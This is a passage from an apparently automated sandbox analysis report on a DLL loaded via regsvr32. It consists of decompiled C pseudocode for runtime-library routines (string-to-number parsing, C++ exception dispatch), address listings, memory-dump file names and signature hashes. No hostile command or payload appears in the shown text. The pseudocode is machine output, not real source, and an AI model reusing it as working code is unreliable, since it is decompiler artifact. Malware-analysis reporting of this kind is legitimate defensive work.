                                                                      				if (_t198 - _a16 < 0) goto 0x800221fb;
                                                                      				if (_t198 - _v152 < 0) goto 0x8002231c;
                                                                      				if (_t198 - _v148 < 0) goto 0x800221fb;
                                                                      				if (_t198 - _v144 < 0) goto 0x8002231c;
                                                                      				if (_t198 - _v140 < 0) goto 0x800221fb;
                                                                      				if (_t198 - _v136 < 0) goto 0x8002231c;
                                                                      				if (_t198 - _v132 < 0) goto 0x800221fb;
                                                                      				if (_t198 - _v128 < 0) goto 0x8002231c;
                                                                      				if (_t198 - _v124 < 0) goto 0x800221fb;
                                                                      				if (_t198 - _v120 < 0) goto 0x8002231c;
                                                                      				if (_t198 - _v116 < 0) goto 0x800221fb;
                                                                      				if (_t198 - _v112 < 0) goto 0x8002231c;
                                                                      				if (_t198 - _v108 < 0) goto 0x800221fb;
                                                                      				if (_t198 - _v104 < 0) goto 0x8002231c;
                                                                      				if (_t198 - _v100 < 0) goto 0x800221fb;
                                                                      				if (_t198 - _v96 < 0) goto 0x8002231c;
                                                                      				if (_t198 - _v92 < 0) goto 0x800221fb;
                                                                      				if (_t198 - _v88 < 0) goto 0x8002231c;
                                                                      				if (_t198 - _v84 < 0) goto 0x800221fb;
                                                                      				if (_t198 - _v80 < 0) goto 0x8002231c;
                                                                      				if (_t198 - _v76 < 0) goto 0x800221fb;
                                                                      				if ((_t198 & 0x0000ffff) - _v72 - 9 > 0) goto 0x8002231c;
                                                                      				goto 0x80022317;
                                                                      				if (_t198 - _v68 >= 0) goto 0x8002231c;
                                                                      				if ((_t198 & 0x0000ffff) - r15d != 0xffffffff) goto 0x8002233f;
                                                                      				_t100 = _t381 - 0x41; // -65
                                                                      				_t101 = _t381 - 0x61; // -97
                                                                      				_t184 = _t101;
                                                                      				if (_t100 - 0x19 <= 0) goto 0x8002232f;
                                                                      				if (_t184 - 0x19 > 0) goto 0x8002233c;
                                                                      				if (_t184 - 0x19 > 0) goto 0x80022337;
                                                                      				goto 0x8002233f;
                                                                      				_t395 =  *_t388;
                                                                      				if (((_t198 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x80022383;
                                                                      				_t199 =  *_t395 & 0x0000ffff;
                                                                      				_t250 = _t372 + _t381;
                                                                      				_t257 = _t250;
                                                                      				r8d = 0x660;
                                                                      				 *_t388 =  &(_t395[1]);
                                                                      				_t254 = ( !=  ? _t134 : _t134 | 0x00000002) | (r12d & 0xffffff00 | _t250 - r12d * r14d > 0x00000000 | r12d & 0xffffff00 | _t256 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                      				goto 0x80022163;
                                                                      				_t399 = _v64;
                                                                      				_t374 = _t395 - 2;
                                                                      				_t397 = _a8;
                                                                      				 *_t388 = _t374;
                                                                      				if (_t199 == 0) goto 0x800223b4;
                                                                      				if ( *_t374 == _t199) goto 0x800223b4;
                                                                      				E0000000118003BFFC( *_t374 - _t199, _t374);
                                                                      				 *_t374 = 0x16;
                                                                      				E0000000118003A794();
                                                                      				if ((dil & 0x00000008) != 0) goto 0x800223d0;
                                                                      				_t375 = _t388[1];
                                                                      				 *_t388 = _t399;
                                                                      				if (_t375 == 0) goto 0x800223c9;
                                                                      				 *_t375 = _t399;
                                                                      				goto 0x80022454;
                                                                      				r8d = 0x80000000;
                                                                      				r9d = _t395 - 1;
                                                                      				if ((dil & 0x00000004) != 0) goto 0x800223f8;
                                                                      				if ((dil & 0x00000001) == 0) goto 0x8002243b;
                                                                      				if ((dil & 0x00000002) == 0) goto 0x800223f3;
                                                                      				if (_t257 - r8d <= 0) goto 0x80022441;
                                                                      				goto 0x800223f8;
                                                                      				if (_t257 - r9d <= 0) goto 0x80022443;
                                                                      				 *((char*)(_t397 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t397 + 0x2c)) = 0x22;
                                                                      				if ((_t254 & 0x00000001) != 0) goto 0x80022413;
                                                                      				goto 0x80022443;
                                                                      				_t386 = _t388[1];
                                                                      				if ((_t254 & 0x00000002) == 0) goto 0x8002242b;
                                                                      				if (_t386 == 0) goto 0x80022426;
                                                                      				 *_t386 =  *_t388;
                                                                      				goto 0x80022454;
                                                                      				if (_t386 == 0) goto 0x80022436;
                                                                      				 *_t386 =  *_t388;
                                                                      				goto 0x80022454;
                                                                      				if ((dil & 0x00000002) == 0) goto 0x80022443;
                                                                      				_t387 = _t388[1];
                                                                      				if (_t387 == 0) goto 0x80022452;
                                                                      				 *_t387 =  *_t388;
                                                                      				return  ~(_t257 | 0xffffffff);
                                                                      			}




























































                                                                      0x180021d18
                                                                      0x180021d18
                                                                      0x180021d18
                                                                      0x180021d1d
                                                                      0x180021d34
                                                                      0x180021d37
                                                                      0x180021d3a
                                                                      0x180021d42
                                                                      0x180021d45
                                                                      0x180021d4b
                                                                      0x180021d4d
                                                                      0x180021d52
                                                                      0x180021d58
                                                                      0x180021d5d
                                                                      0x180021d62
                                                                      0x180021d6b
                                                                      0x180021d6d
                                                                      0x180021d72
                                                                      0x180021d75
                                                                      0x180021d79
                                                                      0x180021d7c
                                                                      0x180021d87
                                                                      0x180021d8c
                                                                      0x180021d91
                                                                      0x180021d98
                                                                      0x180021da1
                                                                      0x180021da4
                                                                      0x180021dad
                                                                      0x180021db1
                                                                      0x180021db5
                                                                      0x180021dba
                                                                      0x180021dc9
                                                                      0x180021dd2
                                                                      0x180021dd4
                                                                      0x180021dd7
                                                                      0x180021dd7
                                                                      0x180021ddb
                                                                      0x180021dde
                                                                      0x180021dee
                                                                      0x180021dfb
                                                                      0x180021e08
                                                                      0x180021e10
                                                                      0x180021e16
                                                                      0x180021e1e
                                                                      0x180021e1e
                                                                      0x180021e22
                                                                      0x180021e2a
                                                                      0x180021e30
                                                                      0x180021e38
                                                                      0x180021e3e
                                                                      0x180021e46
                                                                      0x180021e4e
                                                                      0x180021e56
                                                                      0x180021e5e
                                                                      0x180021e66
                                                                      0x180021e6e
                                                                      0x180021e76
                                                                      0x180021e7e
                                                                      0x180021e86
                                                                      0x180021e8e
                                                                      0x180021e96
                                                                      0x180021e9e
                                                                      0x180021ea6
                                                                      0x180021eae
                                                                      0x180021eb9
                                                                      0x180021ecb
                                                                      0x180021ed4
                                                                      0x180021ede
                                                                      0x180021ee5
                                                                      0x180021eed
                                                                      0x180021ef7
                                                                      0x180021f05
                                                                      0x180021f0d
                                                                      0x180021f16
                                                                      0x180021f24
                                                                      0x180021f2c
                                                                      0x180021f35
                                                                      0x180021f43
                                                                      0x180021f4b
                                                                      0x180021f54
                                                                      0x180021f62
                                                                      0x180021f6a
                                                                      0x180021f72
                                                                      0x180021f80
                                                                      0x180021f8a
                                                                      0x180021f96
                                                                      0x180021fa1
                                                                      0x180021fae
                                                                      0x180021fb9
                                                                      0x180021fc6
                                                                      0x180021fd1
                                                                      0x180021fde
                                                                      0x180021fe9
                                                                      0x180021ff6
                                                                      0x180022001
                                                                      0x18002200e
                                                                      0x180022019
                                                                      0x180022026
                                                                      0x18002202d
                                                                      0x18002203a
                                                                      0x180022041
                                                                      0x18002204e
                                                                      0x180022055
                                                                      0x180022062
                                                                      0x180022069
                                                                      0x180022080
                                                                      0x180022082
                                                                      0x18002208f
                                                                      0x180022099
                                                                      0x18002209e
                                                                      0x1800220a4
                                                                      0x1800220a4
                                                                      0x1800220a7
                                                                      0x1800220ac
                                                                      0x1800220b5
                                                                      0x1800220ba
                                                                      0x1800220bf
                                                                      0x1800220c1
                                                                      0x1800220c4
                                                                      0x1800220ca
                                                                      0x1800220cd
                                                                      0x1800220cd
                                                                      0x1800220d1
                                                                      0x1800220d4
                                                                      0x1800220db
                                                                      0x1800220e0
                                                                      0x1800220e8
                                                                      0x1800220ec
                                                                      0x1800220f2
                                                                      0x1800220f7
                                                                      0x1800220f9
                                                                      0x1800220fe
                                                                      0x180022104
                                                                      0x180022109
                                                                      0x18002210f
                                                                      0x180022115
                                                                      0x18002211b
                                                                      0x18002211d
                                                                      0x180022123
                                                                      0x180022125
                                                                      0x180022129
                                                                      0x180022129
                                                                      0x18002212d
                                                                      0x180022130
                                                                      0x18002213b
                                                                      0x180022145
                                                                      0x180022149
                                                                      0x18002214e
                                                                      0x180022151
                                                                      0x180022151
                                                                      0x180022154
                                                                      0x18002215a
                                                                      0x180022160
                                                                      0x180022167
                                                                      0x180022171
                                                                      0x180022179
                                                                      0x180022182
                                                                      0x18002218c
                                                                      0x18002219a
                                                                      0x1800221a2
                                                                      0x1800221ab
                                                                      0x1800221b9
                                                                      0x1800221c1
                                                                      0x1800221ca
                                                                      0x1800221d8
                                                                      0x1800221e0
                                                                      0x1800221ed
                                                                      0x1800221f3
                                                                      0x1800221f9
                                                                      0x180022200
                                                                      0x18002220d
                                                                      0x18002221b
                                                                      0x180022224
                                                                      0x18002222f
                                                                      0x180022238
                                                                      0x180022243
                                                                      0x18002224c
                                                                      0x180022257
                                                                      0x180022260
                                                                      0x18002226b
                                                                      0x180022274
                                                                      0x18002227f
                                                                      0x18002228c
                                                                      0x180022297
                                                                      0x1800222a4
                                                                      0x1800222ab
                                                                      0x1800222b8
                                                                      0x1800222bf
                                                                      0x1800222cc
                                                                      0x1800222d3
                                                                      0x1800222e0
                                                                      0x1800222e7
                                                                      0x1800222fe
                                                                      0x180022305
                                                                      0x18002230f
                                                                      0x18002231a
                                                                      0x18002231f
                                                                      0x180022325
                                                                      0x180022325
                                                                      0x180022328
                                                                      0x18002232d
                                                                      0x180022332
                                                                      0x18002233a
                                                                      0x18002233f
                                                                      0x180022345
                                                                      0x180022347
                                                                      0x180022351
                                                                      0x180022362
                                                                      0x180022370
                                                                      0x180022379
                                                                      0x18002237c
                                                                      0x18002237e
                                                                      0x180022383
                                                                      0x18002238b
                                                                      0x18002238f
                                                                      0x180022397
                                                                      0x18002239d
                                                                      0x1800223a2
                                                                      0x1800223a4
                                                                      0x1800223a9
                                                                      0x1800223af
                                                                      0x1800223b8
                                                                      0x1800223ba
                                                                      0x1800223be
                                                                      0x1800223c4
                                                                      0x1800223c6
                                                                      0x1800223cb
                                                                      0x1800223d0
                                                                      0x1800223d6
                                                                      0x1800223de
                                                                      0x1800223e4
                                                                      0x1800223ea
                                                                      0x1800223ef
                                                                      0x1800223f1
                                                                      0x1800223f6
                                                                      0x1800223fa
                                                                      0x180022402
                                                                      0x18002240c
                                                                      0x180022411
                                                                      0x180022413
                                                                      0x180022419
                                                                      0x18002241e
                                                                      0x180022423
                                                                      0x180022429
                                                                      0x18002242e
                                                                      0x180022433
                                                                      0x180022439
                                                                      0x18002243f
                                                                      0x180022443
                                                                      0x18002244a
                                                                      0x18002244f
                                                                      0x18002246e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: f$p$p
                                                                      • API String ID: 3215553584-1995029353
                                                                      • Opcode ID: 34fa9f7a56f3f1760f0dc208d675e758cb2d33722ff4ec14d04dc0a5c4326928
                                                                      • Instruction ID: f202e3cc107bea1cd2f5c73b831fbad6ab33553aace31d2b1673cc518ded66d0
                                                                      • Opcode Fuzzy Hash: 34fa9f7a56f3f1760f0dc208d675e758cb2d33722ff4ec14d04dc0a5c4326928
                                                                      • Instruction Fuzzy Hash: D912C03260414996FBA79E95E0447EAB792F358BD0F888011FAE647AC5DF3CC788DB11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 67%
                                                                      			E00000001180054098(void* __edx, void* __esi, void* __eflags, intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9) {
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* __r14;
                                                                      				void* _t157;
                                                                      				intOrPtr _t158;
                                                                      				intOrPtr _t160;
                                                                      				void* _t179;
                                                                      				intOrPtr _t194;
                                                                      				intOrPtr _t200;
                                                                      				void* _t201;
                                                                      				signed long long _t240;
                                                                      				signed long long _t241;
                                                                      				signed char _t242;
                                                                      				intOrPtr* _t244;
                                                                      				long long _t246;
                                                                      				long long _t254;
                                                                      				intOrPtr* _t256;
                                                                      				signed char* _t258;
                                                                      				intOrPtr* _t270;
                                                                      				void* _t291;
                                                                      				void* _t292;
                                                                      				void* _t293;
                                                                      				void* _t294;
                                                                      				signed long long _t295;
                                                                      				long long _t304;
                                                                      				long long _t305;
                                                                      				intOrPtr* _t306;
                                                                      				long long _t314;
                                                                      				signed char* _t317;
                                                                      				intOrPtr _t322;
                                                                      
                                                                      				_t201 = __esi;
                                                                      				_t293 = _t294 - 0x88;
                                                                      				_t295 = _t294 - 0x188;
                                                                      				_t240 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t241 = _t240 ^ _t295;
                                                                      				 *(_t293 + 0x70) = _t241;
                                                                      				_t317 =  *((intOrPtr*)(_t293 + 0xf0));
                                                                      				 *((long long*)(_t295 + 0x78)) = __rdx;
                                                                      				_t258 = _t317;
                                                                      				 *((long long*)(_t293 - 0x60)) =  *((intOrPtr*)(_t293 + 0x108));
                                                                      				_t292 = __r9;
                                                                      				 *((char*)(_t295 + 0x60)) = 0;
                                                                      				E0000000118005179C(__edx, __rcx, _t258, __r9, _t291, __r9, _t317);
                                                                      				if ( *((intOrPtr*)(_t292 + 0x48)) == 0) goto 0x80054114;
                                                                      				E0000000118002DD20(_t241);
                                                                      				if ( *((intOrPtr*)(_t241 + 0x78)) != 0xfffffffe) goto 0x8005458d;
                                                                      				goto 0x80054133;
                                                                      				E0000000118002DD20(_t241);
                                                                      				if ( *((intOrPtr*)(_t241 + 0x78)) == 0xfffffffe) goto 0x80054133;
                                                                      				E0000000118002DD20(_t241);
                                                                      				_t200 =  *((intOrPtr*)(_t241 + 0x78));
                                                                      				E0000000118002DD20(_t241);
                                                                      				 *((intOrPtr*)(_t241 + 0x78)) = 0xfffffffe;
                                                                      				if (_t200 - 0xffffffff < 0) goto 0x8005458d;
                                                                      				if (_t317[8] == 0) goto 0x80054173;
                                                                      				_t242 = _t258[0x180060660];
                                                                      				goto 0x80054175;
                                                                      				if (_t200 >= 0) goto 0x8005458d;
                                                                      				if ( *__rcx != 0xe06d7363) goto 0x8005424d;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x18)) != 4) goto 0x8005424d;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x20)) - 0x19930520 - 2 > 0) goto 0x8005424d;
                                                                      				if ( *((long long*)(__rcx + 0x30)) != 0) goto 0x8005424d;
                                                                      				E0000000118002DD20(_t242);
                                                                      				if ( *((long long*)(_t242 + 0x20)) == 0) goto 0x8005452b;
                                                                      				E0000000118002DD20(_t242);
                                                                      				_t256 =  *((intOrPtr*)(_t242 + 0x20));
                                                                      				E0000000118002DD20(_t242);
                                                                      				 *((char*)(_t295 + 0x60)) = 1;
                                                                      				E000000011800422C8(_t242,  *((intOrPtr*)(_t256 + 0x38)));
                                                                      				if ( *_t256 != 0xe06d7363) goto 0x80054205;
                                                                      				if ( *((intOrPtr*)(_t256 + 0x18)) != 4) goto 0x80054205;
                                                                      				if ( *((intOrPtr*)(_t256 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80054205;
                                                                      				if ( *((long long*)(_t256 + 0x30)) == 0) goto 0x8005458d;
                                                                      				E0000000118002DD20(_t242);
                                                                      				if ( *(_t242 + 0x38) == 0) goto 0x8005424d;
                                                                      				E0000000118002DD20(_t242);
                                                                      				E0000000118002DD20(_t242);
                                                                      				 *(_t242 + 0x38) =  *(_t242 + 0x38) & 0x00000000;
                                                                      				if (E00000001180052D6C(_t242, _t256, _t256,  *(_t242 + 0x38), _t292) != 0) goto 0x80054248;
                                                                      				if (E00000001180052E5C(_t242, _t256,  *(_t242 + 0x38), _t292, _t293) == 0) goto 0x8005456f;
                                                                      				goto 0x8005454b;
                                                                      				E00000001180051C94(_t293 - 0x10, _t317,  *((intOrPtr*)(_t292 + 8)));
                                                                      				if ( *_t256 != 0xe06d7363) goto 0x800544e3;
                                                                      				if ( *((intOrPtr*)(_t256 + 0x18)) != 4) goto 0x800544e3;
                                                                      				if ( *((intOrPtr*)(_t256 + 0x20)) - 0x19930520 - 2 > 0) goto 0x800544e3;
                                                                      				if ( *((intOrPtr*)(_t293 - 0x10)) <= 0) goto 0x800544c8;
                                                                      				 *((intOrPtr*)(_t295 + 0x28)) =  *((intOrPtr*)(_t293 + 0x100));
                                                                      				 *(_t295 + 0x20) = _t317;
                                                                      				r8d = _t200;
                                                                      				_t157 = E00000001180042120(_t256, _t293 - 0x58, _t293 - 0x10, _t291, _t292, _t293);
                                                                      				asm("movups xmm0, [ebp-0x58]");
                                                                      				asm("movdqu [ebp-0x78], xmm0");
                                                                      				asm("psrldq xmm0, 0x8");
                                                                      				asm("movd eax, xmm0");
                                                                      				if (_t157 -  *((intOrPtr*)(_t293 - 0x40)) >= 0) goto 0x800544c8;
                                                                      				_t158 =  *((intOrPtr*)(_t293 - 0x70));
                                                                      				 *((long long*)(_t293 - 0x80)) =  *((intOrPtr*)(_t293 - 0x58));
                                                                      				 *((intOrPtr*)(_t295 + 0x68)) = _t158;
                                                                      				asm("inc ecx");
                                                                      				asm("dec ax");
                                                                      				asm("movups [ebp-0x78], xmm0");
                                                                      				if (_t158 - _t200 > 0) goto 0x80054423;
                                                                      				if (_t200 - _t158 > 0) goto 0x80054423;
                                                                      				_t244 =  *((intOrPtr*)(_t292 + 0x10));
                                                                      				r9d =  *_t244;
                                                                      				E00000001180051D7C(_t244, _t293 + 0x20, _t293 - 0x78,  *((intOrPtr*)(_t292 + 8)));
                                                                      				_t160 =  *((intOrPtr*)(_t293 + 0x20));
                                                                      				r12d = 0;
                                                                      				 *((intOrPtr*)(_t295 + 0x64)) = r12d;
                                                                      				 *((intOrPtr*)(_t295 + 0x6c)) = _t160;
                                                                      				if (_t160 == 0) goto 0x80054423;
                                                                      				asm("movups xmm0, [ebp+0x38]");
                                                                      				asm("movups xmm1, [ebp+0x48]");
                                                                      				asm("movups [ebp-0x38], xmm0");
                                                                      				asm("movsd xmm0, [ebp+0x58]");
                                                                      				asm("movsd [ebp-0x18], xmm0");
                                                                      				asm("movups [ebp-0x28], xmm1");
                                                                      				E000000011800422B4(_t244);
                                                                      				_t246 = _t244 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x30)) + 0xc));
                                                                      				 *((long long*)(_t295 + 0x70)) = _t246;
                                                                      				E000000011800422B4(_t246);
                                                                      				r15d =  *((intOrPtr*)(_t246 +  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x30)) + 0xc))));
                                                                      				if (r15d <= 0) goto 0x800543ae;
                                                                      				E000000011800422B4(_t246);
                                                                      				_t314 = _t246 +  *((intOrPtr*)( *((intOrPtr*)(_t295 + 0x70))));
                                                                      				if (E000000011800534F0(_t201, _t256, _t293 - 0x38, _t314, _t291, _t292,  *((intOrPtr*)(_t256 + 0x30))) != 0) goto 0x800543cb;
                                                                      				 *((long long*)(_t295 + 0x70)) =  *((long long*)(_t295 + 0x70)) + 4;
                                                                      				r15d = r15d - 1;
                                                                      				if (r15d > 0) goto 0x80054374;
                                                                      				r12d =  *((intOrPtr*)(_t295 + 0x64));
                                                                      				E00000001180051EE0( *((intOrPtr*)(_t295 + 0x70)), _t293 + 0x20);
                                                                      				r12d = r12d + 1;
                                                                      				 *((intOrPtr*)(_t295 + 0x64)) = r12d;
                                                                      				if (r12d ==  *((intOrPtr*)(_t295 + 0x6c))) goto 0x8005441f;
                                                                      				goto 0x8005432b;
                                                                      				 *((char*)(_t295 + 0x58)) =  *((intOrPtr*)(_t293 + 0xf8));
                                                                      				_t270 = _t256;
                                                                      				 *((char*)(_t295 + 0x50)) =  *((intOrPtr*)(_t295 + 0x60));
                                                                      				 *((long long*)(_t295 + 0x48)) =  *((intOrPtr*)(_t293 - 0x60));
                                                                      				 *((intOrPtr*)(_t295 + 0x40)) =  *((intOrPtr*)(_t293 + 0x100));
                                                                      				 *((long long*)(_t295 + 0x38)) = _t293 - 0x78;
                                                                      				 *((long long*)(_t295 + 0x30)) = _t314;
                                                                      				 *((long long*)(_t295 + 0x28)) = _t293 - 0x38;
                                                                      				 *(_t295 + 0x20) = _t317;
                                                                      				E00000001180054880(_t258[0x180060670], _t256, _t270,  *((intOrPtr*)(_t295 + 0x78)),  *((intOrPtr*)(_t242 + 0x28)), _t292);
                                                                      				_t322 =  *((intOrPtr*)(_t293 - 0x80));
                                                                      				_t304 =  *((intOrPtr*)(_t322 + 8)) -  *((char*)(_t270 + 0x180060660));
                                                                      				 *((long long*)(_t322 + 8)) = _t304;
                                                                      				 *(_t322 + 0x18) =  *(_t304 - 4) >>  *(_t270 + 0x180060670);
                                                                      				_t305 = _t304 -  *((char*)(_t270 + 0x180060660));
                                                                      				 *((long long*)(_t322 + 8)) = _t305;
                                                                      				 *(_t322 + 0x1c) =  *(_t305 - 4) >>  *(_t270 + 0x180060670);
                                                                      				_t306 = _t305 -  *((char*)(_t270 + 0x180060660));
                                                                      				 *(_t322 + 0x20) =  *(_t306 - 4) >>  *(_t270 + 0x180060670);
                                                                      				_t194 =  *((intOrPtr*)(_t295 + 0x68)) + 1;
                                                                      				 *((long long*)(_t322 + 8)) = _t306;
                                                                      				_t116 = _t306 + 4; // 0x4
                                                                      				_t254 = _t116;
                                                                      				 *((long long*)(_t322 + 8)) = _t254;
                                                                      				 *((intOrPtr*)(_t322 + 0x24)) =  *_t306;
                                                                      				 *((intOrPtr*)(_t295 + 0x68)) = _t194;
                                                                      				if (_t194 -  *((intOrPtr*)(_t293 - 0x40)) < 0) goto 0x800542da;
                                                                      				if (( *_t317 & 0x00000040) == 0) goto 0x8005451f;
                                                                      				if (E00000001180041FA0(_t317) == 0) goto 0x80054575;
                                                                      				goto 0x8005451f;
                                                                      				if ( *((intOrPtr*)(_t293 - 0x10)) <= 0) goto 0x8005451f;
                                                                      				if ( *((char*)(_t293 + 0xf8)) != 0) goto 0x8005458d;
                                                                      				 *((long long*)(_t295 + 0x38)) = _t314;
                                                                      				 *((intOrPtr*)(_t295 + 0x30)) =  *((intOrPtr*)(_t293 + 0x100));
                                                                      				 *((intOrPtr*)(_t295 + 0x28)) = _t200;
                                                                      				 *(_t295 + 0x20) = _t317;
                                                                      				E00000001180054954( *_t306, _t256, _t322,  *((intOrPtr*)(_t242 + 0x28)), _t292);
                                                                      				_t179 = E0000000118002DD20(_t254);
                                                                      				if ( *((long long*)(_t254 + 0x38)) != 0) goto 0x8005458d;
                                                                      				return E00000001180002FB0(_t179, _t194,  *(_t293 + 0x70) ^ _t295);
                                                                      			}



































                                                                      0x180054098
                                                                      0x1800540a5
                                                                      0x1800540ad
                                                                      0x1800540b4
                                                                      0x1800540bb
                                                                      0x1800540be
                                                                      0x1800540c2
                                                                      0x1800540d6
                                                                      0x1800540db
                                                                      0x1800540e1
                                                                      0x1800540e5
                                                                      0x1800540e8
                                                                      0x1800540f0
                                                                      0x1800540fb
                                                                      0x1800540fd
                                                                      0x180054106
                                                                      0x180054112
                                                                      0x180054114
                                                                      0x18005411d
                                                                      0x18005411f
                                                                      0x180054124
                                                                      0x180054127
                                                                      0x18005412c
                                                                      0x180054136
                                                                      0x180054148
                                                                      0x180054158
                                                                      0x180054171
                                                                      0x180054177
                                                                      0x180054183
                                                                      0x18005418d
                                                                      0x18005419e
                                                                      0x1800541a9
                                                                      0x1800541af
                                                                      0x1800541b9
                                                                      0x1800541bf
                                                                      0x1800541c4
                                                                      0x1800541c8
                                                                      0x1800541d1
                                                                      0x1800541da
                                                                      0x1800541e5
                                                                      0x1800541eb
                                                                      0x1800541f8
                                                                      0x1800541ff
                                                                      0x180054205
                                                                      0x18005420f
                                                                      0x180054211
                                                                      0x18005421a
                                                                      0x180054225
                                                                      0x180054231
                                                                      0x18005423d
                                                                      0x180054243
                                                                      0x180054258
                                                                      0x180054263
                                                                      0x18005426d
                                                                      0x18005427e
                                                                      0x180054288
                                                                      0x180054298
                                                                      0x1800542a3
                                                                      0x1800542a8
                                                                      0x1800542ab
                                                                      0x1800542b0
                                                                      0x1800542b4
                                                                      0x1800542b9
                                                                      0x1800542be
                                                                      0x1800542c5
                                                                      0x1800542cf
                                                                      0x1800542d2
                                                                      0x1800542d6
                                                                      0x1800542da
                                                                      0x1800542df
                                                                      0x1800542e4
                                                                      0x1800542ea
                                                                      0x1800542f6
                                                                      0x1800542fc
                                                                      0x18005430c
                                                                      0x18005430f
                                                                      0x180054314
                                                                      0x180054317
                                                                      0x18005431a
                                                                      0x18005431f
                                                                      0x180054325
                                                                      0x18005432b
                                                                      0x18005432f
                                                                      0x180054333
                                                                      0x180054337
                                                                      0x18005433c
                                                                      0x180054341
                                                                      0x180054345
                                                                      0x180054356
                                                                      0x180054359
                                                                      0x18005435e
                                                                      0x18005436b
                                                                      0x180054372
                                                                      0x180054374
                                                                      0x180054388
                                                                      0x180054399
                                                                      0x18005439b
                                                                      0x1800543a1
                                                                      0x1800543a7
                                                                      0x1800543a9
                                                                      0x1800543b2
                                                                      0x1800543b7
                                                                      0x1800543ba
                                                                      0x1800543c4
                                                                      0x1800543c6
                                                                      0x1800543dc
                                                                      0x1800543e0
                                                                      0x1800543e7
                                                                      0x1800543ef
                                                                      0x1800543fa
                                                                      0x180054402
                                                                      0x18005440b
                                                                      0x180054410
                                                                      0x180054415
                                                                      0x18005441a
                                                                      0x18005441f
                                                                      0x180054445
                                                                      0x18005444e
                                                                      0x180054452
                                                                      0x18005446d
                                                                      0x180054476
                                                                      0x18005447a
                                                                      0x180054495
                                                                      0x1800544a2
                                                                      0x1800544a6
                                                                      0x1800544a8
                                                                      0x1800544ac
                                                                      0x1800544ac
                                                                      0x1800544b3
                                                                      0x1800544b7
                                                                      0x1800544bb
                                                                      0x1800544c2
                                                                      0x1800544cc
                                                                      0x1800544db
                                                                      0x1800544e1
                                                                      0x1800544e7
                                                                      0x1800544f0
                                                                      0x1800544ff
                                                                      0x180054507
                                                                      0x18005450e
                                                                      0x180054515
                                                                      0x18005451a
                                                                      0x18005451f
                                                                      0x180054529
                                                                      0x18005454a

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                      • String ID: MZx$csm$csm$csm
                                                                      • API String ID: 3523768491-2572334722
                                                                      • Opcode ID: 8bb3f466336d4a5c0eed9619a16a00969c9a296d6afd415c2dbc1e24d024574c
                                                                      • Instruction ID: 71b0b6ee62be77fd766794736f8daca252044b3c4efa0e3cd3754299da43f7d6
                                                                      • Opcode Fuzzy Hash: 8bb3f466336d4a5c0eed9619a16a00969c9a296d6afd415c2dbc1e24d024574c
                                                                      • Instruction Fuzzy Hash: AAE19F73604A888AEBA2DF24D4843ED37A0F34978CF558116FE895B69ADF35C689C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
